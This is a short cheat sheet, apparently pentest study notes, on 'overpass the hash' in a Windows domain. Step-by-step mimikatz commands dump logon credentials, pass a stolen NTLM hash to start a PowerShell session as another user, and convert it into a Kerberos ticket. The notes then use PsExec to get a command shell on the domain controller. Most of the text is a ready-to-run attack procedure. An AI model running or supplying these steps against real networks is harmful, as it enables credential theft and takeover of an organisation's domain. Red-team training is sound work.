# OverPass the hash

## Overpass the hash

With overpass the hash, we can “over” abuse a NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as that user.

1. Transfer all 3 mimikatz file to run mimikatz.exe mimikatz.exe
2. Give privilege access privilege::debug
3. sekurlsa::logonpasswords Skip this step, if you already have hash
4. sekurlsa::pth /user:\<user> /domain:\<domain> /ntlm:\<ntlm hash> /run:PowerShell.exe At this point, we have a new PowerShell session that allows us to execute commands as \<user>.
5. exit mimikatz
6. klist No Kerberos tickets have been cached, but this is expected since \<user> has not performed an interactive login.
7. net use \\\\\<dc\_machine\_name> However, let’s generate a TGT by authenticating to a network share on the **domain controller** **or another service** with net use:
8. klist

*We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM) such as the official PsExec application from Microsoft*

9. .\PsExec.exe \\\\\<dc\_machine\_name> cmd.exe
10. ipconfig to check

*successfully reused the Kerberos TGT to launch a command shell on the domain controller.*